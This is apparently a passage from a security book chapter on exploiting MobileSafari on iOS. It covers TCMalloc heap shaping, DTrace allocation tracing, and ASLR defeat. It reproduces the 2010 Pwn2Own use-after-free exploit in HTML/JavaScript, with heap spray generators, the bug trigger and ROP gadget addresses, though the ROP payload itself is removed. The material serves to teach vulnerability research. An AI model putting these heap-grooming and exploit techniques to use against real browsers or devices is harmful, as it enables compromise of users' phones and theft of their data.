(gdb) continue Continuing. Hardware access (read/write) watchpoint 8: *(int *) 2683072 Value = -1391648216 0x9ad7ee0e in WebCore::JSNodeOwner::isReachableFromOpaqueRoots () (gdb) Continuing. Hardware access (read/write) watchpoint 8: *(int *) 2683072 Value = -1391648216 0x9ad7ee26 in WebCore::JSNodeOwner::isReachableFromOpaqueRoots () (gdb) Continuing. Hardware access (read/write) watchpoint 8: *(int *) 2683072 Old value = -1391648216 New value = -1391646616 0x9b4f141c in non-virtual thunk to WebCore::HTMLDivElement::∼HTMLDivElement() () (gdb) bt 20 #0 0x9b4f141c in non-virtual thunk to WebCore::HTMLDivElement ::∼HTMLDivElement() () #1 0x9adf60d2 in WebCore::JSHTMLDivElement::∼JSHTMLDivElement () #2 0x970c5887 in JSC::MarkedBlock::sweep () Previous frame inner to this frame (gdb could not unwind past this frame) (gdb)
So the object is freed only after the Nitro garbage collector is invoked. It is pretty vital, then, to understand when and how the Nitro garbage collector is triggered.
The Nitro garbage collector is invoked in three scenarios:
Clearly, the easiest option to control the garbage collector is with the third scenario. The process is pretty much the same as the one that triggered it in the previous example. A number of objects can be used to trigger the behavior of the third scenario, for instance images, arrays, and strings. You see later that in the Pwn2Own case study, strings and arrays are used, but the choice of the object depends on the bug in question.
The next important step is to find objects over which you have as much control as possible, and use those to tame the heap, and, in case of object lifetime issues, replace the faulty object. Usually, strings and arrays fit the purposes fine. What you need to pay particular attention to, most of the time, is the ability to control the first four bytes of the object you are using for replacing the faulty ones, because those four bytes are where the virtual function table pointer is located, and controlling it is usually the easiest way to obtain code execution.
Debugging heap manipulation code can be tricky, and no default Mac OS X or iPhone tools offer support for TCMalloc heap debugging. Because the implementation of TCMalloc used on the iPhone is the same one used on Mac OS X, you can perform all the debugging needed on Mac OS X using Dtrace. This section doesn't cover the details of Dtrace or the D language, but presents two scripts that ease the debugging process. These scripts will be extremely useful for your exploitation work.
The first script records allocations of all sizes and prints a stack trace:
#pragma D option mangled BEGIN { printf("let's start with js tracing"); } pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:entry { printf("Size %d ", arg0); ustack(4); }
The second one allows you to trace allocations and deallocations of a specific size:
#pragma D option mangled BEGIN { printf("let's start with allocation tracing"); } pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:entry { self->size = arg0; } pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:return /self->size == 60/ { printf("Pointer 0x%x ", arg1); addresses[arg1] = 1; ustack(2); } pid$target:JavaScriptCore:_ZN3WTF8fastFreeEPv:entry /addresses[arg0]/ { addresses[arg0] = 0; printf("Object freed 0x%x ", arg0); ustack(2); }
The only thing you need to do to port results from Mac OS X to iOS is determine the correct object sizes; those sizes might change between the two versions. Doing this is relatively easy; in fact, most of the time it is possible to locate the size of the object you are dealing with in a binary. Alternatively, by using BinDiff on the Mac OS X and iOS WebKit binary, it is often possible to understand the size.
Another invaluable tool when it comes to debugging heap sprays is vmmap. This allows you to see the full content of the process address space. Grepping for JavaScript in the vmmap output shows which regions of memory are allocated by TCMalloc. Knowing common address ranges is useful when you have to do some guesswork on addresses (for instance, when pointing a fake vtable pointer to an attacker-controlled memory location).
In general, it is preferable when developing an exploit for iOS to debug it using the 32-bit version of Safari on Mac OS X instead of the 64-bit one. This way, the number of differences in terms of object sizes and allocator between the two will be significantly lowered.
Armed with knowledge of the allocator, the ways to trigger the garbage collector, and the objects to use, you can now proceed with shaping the heap.
The plan is pretty straightforward; the first step is to allocate a number of objects to defragment the heap. This is not rocket science, and depending on the state of the heap at the beginning of the execution of the exploit, the number of objects needed may change slightly. Defragmenting the heap is pretty important because this way it is possible to guarantee that the following objects will be allocated consecutively in-memory. Once the heap is defragmented, the goal is to create holes in between objects on the heap. To do so, first a bunch of objects are allocated, and then every other object is freed. At this stage, you are all set to allocate the vulnerable object. If the defragmentation worked as expected, the heap will contain the vulnerable object in between two objects of your choice.
The last step is to trigger the bug and obtain code execution.
The following code snippet illustrates the process that needs to be carried out to obtain the correct heap layout. You can use the Dtrace script shown in the previous section to trace the allocations and verify that the JavaScript code is working properly:
<html> <body onload="start()"> <script> var shui = new Array(10000); var gcForce = new Array(30000); //30000 should be enough to trigger a garbage collection var vulnerable = new Array(10); function allocateObjects() { for(i = 0; i < shui.length; i++) shui[i] = String.fromCharCode(0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181); } function createHoles() { for(i = 0; i < shui.length; i+=2) delete shui[i]; } function forceGC() { for(i = 0; i < gcForce.length; i++) gcForce[i] = String.fromCharCode(0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282); } function allocateVulnerable() { for(i = 0; i < vulnerable.length; i++) vulnerable[i] = document.createElement("div"); } function start() { alert("Attach here"); allocateObjects(); createHoles(); forceGC(); allocateVulnerable(); } </script> </body> </html>
Before you can fully understand this code, you need to consider some things. First of all, it is vital to understand the size of the vulnerable object; in this case you are dealing with a 60-byte HTML div element. You can use different methods to ascertain the size of the object: either trace it dynamically in a debugger, use another Dtrace script, or statically determine it by looking at the constructor of the object in a disassembler.
When the object size is known, the second thing you need to do is find a way to properly replace the object. Looking into the WebKit source code you can find the following code initializing a string:
PassRefPtr<StringImpl> StringImpl::createUninitialized( unsigned length, UChar*& data) { if (!length) { data = 0; return empty(); } // Allocate a single buffer large enough to contain the StringImpl // struct as well as the data which it contains. This removes one // heap allocation from this call. if (length > ((std::numeric_limits<unsigned>::max() - sizeof(StringImpl)) / sizeof(UChar))) CRASH(); size_t size = sizeof(StringImpl) + length * sizeof(UChar); StringImpl* string = static_cast<StringImpl*>(fastMalloc(size)); data = reinterpret_cast<UChar*>(string + 1); return adoptRef(new (string) StringImpl(length)); }
So, it appears that an attacker can easily control the size of the allocation. In the past, strings were even better in that the attacker had total control over the whole content of the buffer. These days, strings turn out to be less useful because no obvious ways exist to control the first four bytes of the buffer. Nonetheless, for the purpose of this chapter you will be using them because they can be sized easily to fit any vulnerable object size that might be needed.
Of particular importance is the way the length of the string is calculated:
size_t size = sizeof(StringImpl) + length * sizeof(UChar);
This tells you how many characters you need to put in your JavaScript code. The size of SringImpl is 20 bytes, and a UChar is two bytes long. Therefore, to allocate 60 bytes of data you need 20 characters in the JavaScript string.
At this point you are all set to verify that the code is working properly, that is, the HTML div elements are allocated between strings.
Running this code in the browser and tracing the output with the Dtrace script provided earlier shows the following output:
snaggs-MacBook-Air:∼ snagg$sudo dtrace -s Documents/Trainings/Mac hacking training/Materials/solutions_day2/9_WebKit/traceReplace.d -p 1498 -o out2 dtrace: script ‘Documents/Trainings/Mac hacking training/Materials/solutions_day2/9_WebKit/traceReplace.d’ matched 6 probes dtrace: 2304 dynamic variable drops dtrace: error on enabled probe ID 6 ( ID 28816: pid1498:JavaScriptCore:_ZN3WTF8fastFreeEPv:entry): invalid address (0x3) in action #3 ˆCsnaggs-MacBook-Air:∼ snagg$ snaggs-MacBook-Air:∼ snagg$cat out2 | grep HTMLDiv WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b snaggs-MacBook-Air:∼ snagg$cat out2 | grep HTMLDiv | wc -l 10
You have the 10 vulnerable objects in the Dtrace output. By attaching to the process with gdb you can verify that the div objects are allocated between strings. Arbitrarily picking one of the 10 vulnerable objects from the Dtrace output, you have:
2 8717 _ZN3WTF10fastMallocEm:return Pointer 0x2e5ec00 JavaScriptCore‘_ZN3WTF10fastMallocEm+0x1b2 WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS _8DocumentE+0x1b
Now you can inspect the memory with gdb:
(gdb) x/40x 0x2e5ec00 0x2e5ec00: 0xad0d2228 0xad0d24cc 0x00000001 0x00000000 0x2e5ec10: 0x6d2e8654 0x02f9cb00 0x00000000 0x00000000 0x2e5ec20: 0x00000000 0x0058003c 0x00000000 0x00000000 0x2e5ec30: 0x00306ed0 0x00000000 0x00000000 0x00000000 0x2e5ec40: 0x02e5e480 0x00000014 0x02e5ec54 0x00000000 0x2e5ec50: 0x00000000 0x81818181 0x81818181 0x81818181 0x2e5ec60: 0x81818181 0x81818181 0x81818181 0x81818181 0x2e5ec70: 0x81818181 0x81818181 0x81818181 0x00000010 0x2e5ec80: 0x00000000 0x00000030 0x00000043 0x00000057 0x2e5ec90: 0x00000000 0x81818181 0x81818181 0x81818181 (gdb) x/40x 0x2e5ec00 - 0x40 0x2e5ebc0: 0x02e5ed00 0x00000014 0x02e5ebd4 0x00000000 0x2e5ebd0: 0x00000000 0x81818181 0x81818181 0x81818181 0x2e5ebe0: 0x81818181 0x81818181 0x81818181 0x81818181 0x2e5ebf0: 0x81818181 0x81818181 0x81818181 0x82828282 0x2e5ec00: 0xad0d2228 0xad0d24cc 0x00000001 0x00000000 0x2e5ec10: 0x6d2e8654 0x02f9cb00 0x00000000 0x00000000 0x2e5ec20: 0x00000000 0x0058003c 0x00000000 0x00000000 0x2e5ec30: 0x00306ed0 0x00000000 0x00000000 0x00000000 0x2e5ec40: 0x02e5e480 0x00000014 0x02e5ec54 0x00000000 0x2e5ec50: 0x00000000 0x81818181 0x81818181 0x81818181 (gdb)
It is clear that both before and after the div object you have two strings with your own content (0x8181).
The importance of being able to overwrite application-specific data in TCMalloc lies in the fact that, similar to what it is done for objects in the large region in magazine malloc, the heap metadata is stored separately from each heap block. Therefore, overwriting a TCMalloc'd buffer will not overwrite heap metadata, but rather the buffer allocated after it. Thus, it is not possible to take advantage of the typical old heap exploitation techniques used to obtain code execution.
When it comes to object lifetime issues, it is not strictly necessary to have the vulnerable object in between two objects over which you have control. It is more important to ensure that you are able to replace the object with good reliability. In this scenario, the first step of the attack is to allocate one or more vulnerable objects. Afterwards, the action that triggers the release of the object needs to be performed. The next step is to allocate enough objects of the same size of the vulnerable object to make sure that a garbage collection occurs, and at the same time that the vulnerable object is replaced with an object of your choice. At this point the only step left is to trigger a “use” condition to obtain code execution.
It is important to note that the same procedure used for arithmetic vulnerabilities can be used for object lifetime issues as well. However, in that case you must pay particular attention to the size of the objects you use and the number of objects you allocate. In fact, the first time you defragment the heap, a garbage collection occurs; therefore, to trigger the garbage collector another time after the object is freed, a higher number of objects is required.
The same problem occurs when you free the objects in between the ones you control; to make sure that the vulnerable object is placed in a hole, another garbage collection must be triggered. Given the structure of TCMalloc, it is clear that the ideal way of triggering the garbage collector to exploit the vulnerability is to use objects of a different size than the vulnerable one. In fact, by doing so the freelist for the vulnerable object will not change much and you avoid jeopardizing the success of your exploit.
Up to version 4.3 it was possible to develop a Return Oriented Programming (ROP) payload and an exploit for iOS without worrying too much about Address Space Layout Randomization (ASLR). In fact, although there was still some guesswork involved in understanding where attacker-controlled data would be placed in the process address space, there were no problems in terms of ROP payload development because all the libraries, the main binary, and the dynamic linker were all placed at predictable addresses.
Starting with iOS 4.3, Apple introduced full address space layout randomization on the iPhone.
ASLR on iOS randomizes all the libraries that are stored together in dyld_shared_cache — the dynamic linker, the heap, the stack — and if the application supports position independent code, the main executable is randomized as well.
This poses numerous problems for attackers, mainly for two reasons. The first one is the inability to use ROP in their payload, and the second one is the guesswork involved with finding the address where attacker-controlled data might be placed.
There is no one-size-fits-all way to defeat ASLR. Quite the contrary — every exploit has its own peculiarities that might provide a way to leak addresses useful to an attacker.
A good example of ASLR defeat through repurposing an overflow is the Saffron exploit by comex. In that exploit, a missing check on an argument counter allowed an attacker to read and write from the following structure:
typedef struct T1_DecoderRec_ { T1_BuilderRec builder; FT_Long stack[T1_MAX_CHARSTRINGS_OPERANDS]; FT_Long* top; T1_Decoder_ZoneRec zones[T1_MAX_SUBRS_CALLS + 1]; T1_Decoder_Zone zone; FT_Service_PsCMaps psnames; /* for seac */ FT_UInt num_glyphs; FT_Byte** glyph_names; FT_Int lenIV; /* internal for sub routine calls */ FT_UInt num_subrs; FT_Byte** subrs; FT_PtrDist* subrs_len; /* array of subrs length (optional) */ FT_Matrix font_matrix; FT_Vector font_offset; FT_Int flex_state; FT_Int num_flex_vectors; FT_Vector flex_vectors[7]; PS_Blend blend; /* for multiple master support */ FT_Render_Mode hint_mode; T1_Decoder_Callback parse_callback; T1_Decoder_FuncsRec funcs; FT_Long* buildchar; FT_UInt len_buildchar; FT_Bool seac; } T1_DecoderRec;
The attacker then read a number of pointers, including parse_callback, and stored a ROP payload constructed with the knowledge obtained by the out-of-bound read in the buildchar member. Finally, the attacker overwrote the parse_callback member and triggered a call to it. At that point, the ASLR-defeating ROP payload was executed.
In general, the burden of defeating ASLR and the lack of generic methods to use greatly increases the development effort that an attacker has to put into each exploit. More importantly, while in the past it was possible to get away with guesswork because libraries were not randomized, and therefore constructing a payload was not a problem, from 4.3 on, an exploit must defeat ASLR to be successful.
The next section analyzes an exploit for MobileSafari that did not need to bypass ASLR.
This case study presents the Pwn2Own exploit used in 2010. For the scope of this chapter we have taken out the payload that was used because ROP concepts are properly explained and commented in a different chapter of the book.
The function pwn() is responsible for bootstrapping the exploit. The first thing that is done in there is to generate a JavaScript function that creates an array of strings. The strings are created using the fromCharCode() function, which guarantees that you create a string of the correct size (see the example on heap feng shui in the paragraph describing exploitation techniques against TCMalloc for more details on the string implementation in WebKit). Each string is the size of the object that needs to be replaced (20 UChars that are 40 bytes) and the number of strings to allocate (4000 in this case). The rest of the parameters specify the content of the string. It will be filled with some exploit-specific data and the rest of it will be filled with an arbitrary value (0xCCCC).
The vulnerability itself is caused by attribute objects that were not properly deleted from the Node cache when the attributes were deallocated. The rest of the pwn() function takes care of allocating a number of attribute objects and to remote them right after the allocation.
At this point the exploit triggers the garbage collector by calling the nodeSpray() function, which is the function generated at the beginning by genNodeSpray(). In addition to triggering the garbage collector, and thus making sure that the attributes are released by the allocator, it also replaces them with strings of the correct size.
The last step is to spray the heap with the shellcode that needs to be executed and trigger a call to a virtual function (focus() in this case). This way the first four bytes of the string that is used to replace the object act as a virtual table pointer and divert the execution to a location the attacker controls.
<html> <body onload="pwn()"> <script> function genNodeSpray3GS (len, count, addy1, addy2, ret1, ret2, c, objname) { var evalstr = "function nodeSpray() { for(var i = 0; i < " + count + "; i++) { "; evalstr += objname + "[i]" + " = String.fromCharCode("; var slide = 0x1c; for (var i = 0; i < len; i++) { if (i == 0 ) { evalstr += addy1; } else if (i == 1 || i == 17) { evalstr += addy2; evalstr += addy1 + slide; }else if(i == 18) { evalstr +=ret2; }else if(i == 19) { evalstr += ret1; } else if (i > 1 && i< 4) { evalstr += c; } else { evalstr += 0; } if (i != len-1) { evalstr += ","; } } evalstr += "); }}"; return evalstr; } function genNodeSpray (len, count, addy1, addy2, c, objname) { var evalstr = "function nodeSpray() { for (var i = 0; i < " + count + "; i++) { "; evalstr += objname + "[i]" + " = String.fromCharCode("; for (var i = 0; i < len; i++) { if (i == 0) { evalstr += addy1; } else if (i == 1) { evalstr += addy2; } else if (i > 1 && i< 4) { evalstr += c; } else { evalstr += 0; } if (i != len-1) { evalstr += ","; } } evalstr += "); }}"; return evalstr; } function pwn() { var obj = new Array(4000); var attrs = new Array(100); // Safari 4.0.5 (64 bit, both DEBUG & RELEASE) 74 bytes -> 37 UChars // Safari 4.0.5 (32 bit, both DEBUG & RELEASE) 40 bytes -> 20 UChars // MobileSafari/iPhone 3.1.3 40 bytes -> 20 UChars // 0x4a1c000 --> 0 open pages // 0x4d00000 --> 1 open page // 3g 0x5000000 //eval(genNodeSpray(20, 8000, 0x0000, 0x0500, 52428, "obj")); eval(genNodeSpray3GS (20, 4000, 0x0000, 0x0600, 0x328c, 0x23ef, 52428, "obj")); // iOS 3.1.3 (2G/3G): // gadget to gain control of SP, located at 0x33b4dc92 (libSystem) // // 33b4dc92 469d mov sp, r3 // 33b4dc94 bc1c pop {r2, r3, r4} // 33b4dc96 4690 mov r8, r2 // 33b4dc98 469a mov sl, r3 // 33b4dc9a 46a3 mov fp, r4 // 33b4dc9c bdf0 pop {r4, r5, r6, r7, pc} // // note that we need to use jumpaddr+1 to enter thumb mode // [for iOS 3.0 (2G/3G) use gadget at 0x31d8e6b4] // // // iOS 3.1.3 3GS: // // gadget to gain control of SP, a bit more involved we can't mov r3 in sp so we do it in two stages: // // 3298d162 6a07 ldr r7, [r0, #32] // 3298d164 f8d0d028 ldr.w sp, [r0, #40] // 3298d168 6a40 ldr r0, [r0, #36] // 3298d16a 4700 bx r0 // // r0 is a pointer to the crafted node. We point r7 to our crafted stack, and r0 to 0x328c23ee. // the stack pointer points to something we don't control as the node is 40 bytes long. // // 328c23ee f1a70d00 sub.w sp, r7, #0 ; 0x0 // 328c23f2 bd80 pop {r7, pc} // //3GS var trampoline = "123456789012" + encode_uint32(0x3298d163); //var ropshellcode = vibrate_rop_3_1_3_gs(); //we have to skip the first 28 bytes var ropshellcode = stealFile_rop_3_1_3_gs(0x600001c); //3G //var trampoline = "123456789012" + encode_uint32(0x33b4dc93); //var ropshellcode = vibrate_rop_3_1_3_g(); for(var i = 0; i < attrs.length; i++) { attrs[i] = document.createAttribute(‘PWN’); attrs[i].nodeValue = 0; } // dangling pointers are us. for(var i = 0; i < attrs.length; i++) { // bug trigger (used repeatedly to increase reliability) attrs[i].removeChild(attrs[i].childNodes[0]); } nodeSpray(); // no pages open: we can spray 10000 strings w/o SIGKILL // 1 page open: we can only spray 8000 strings w/o SIGKILL var retaddrs = new Array(20000); for(var i = 0; i < retaddrs.length; i++) { retaddrs[i] = trampoline + ropshellcode; } // use after free on WebCore::Node object // overwritten vtable pointer gives us control over PC attrs[50].childNodes[0].focus(); } </script> </body> </html>
A number of difficulties become apparent when it comes to determining the most appropriate testing infrastructure to use while developing an exploit.
You have a number of factors to consider when testing an exploit. First of all, the application version used for testing needs to be the same as or as close as possible to the one the exploit is supposed to work on. The allocator functioning on the testing platform needs to be as close as possible to the real one. Finally, there must be an easy way to test the exploit multiple times.
In general, while developing, it is always a good idea to have tools like diff for source code or BinDiff for binaries that allow you to explore the differences between the real system and the testing one.
In a similar fashion to the processes you've seen in the course of this chapter, where most of the tests were conducted on Mac OS X, it is often possible to use a virtual machine or a computer running Mac OS X to start the development. In fact, by diffing either the source code or the binary it is possible to identify the characteristics common to the testing environment and the deployment environment.
Usually, you can use two strategies to test an exploit. The first one starts by developing it for Mac OS X on 32-bits (in a virtual machine in case you are dealing with the system heap), then porting it to a jailbroken iPhone, and finally, testing it on a non-jailbroken one. Using this method allows you to get around the problem of not having a debugger available on a non-jailbroken iPhone.
The second strategy is applicable only if the vulnerability can be reproduced in a test program. That is, it is possible to include the vulnerable library or framework in a test application to be deployed on a developer iPhone and mimic the triggering conditions from the test application. This strategy is rarely applicable, but when it is, it allows you to debug the exploit directly on the phone by using the Xcode debugging capabilities for iPhone applications.
Finally, it is vital to not make any assumptions on the capabilities of the exploit in the test environment. In fact, applications on the iPhone are sandboxed in a fashion that might be different from Mac OS X. Moreover, jailbreaking an iPhone changes the underlying security infrastructure of the phone severely, thus it is always better to test the payload intended to be run with the exploit separately.
In Chapter 8 you see a few ideas on how to perform such testing.
This chapter explored the inner mechanisms of the two most used allocators on iOS. It used Mac OS X as a testing platform to do most of the grudge work involved in exploitation.
A number of techniques to control both TCMalloc and the system heap were explained. Specifically, this chapter strove to divide techniques based on the kinds of vulnerabilities for which they are the most suitable. You saw what challenges exploitation on newer versions of the iPhone firmware create, specifically the problem of creating a reliable and portable exploit due to ASLR.
Finally, you saw a real-life example of a MobileSafari exploit targeting iOS 3.1.3, and learned strategies to precisely test an exploit without incurring porting problems and wrong assumptions.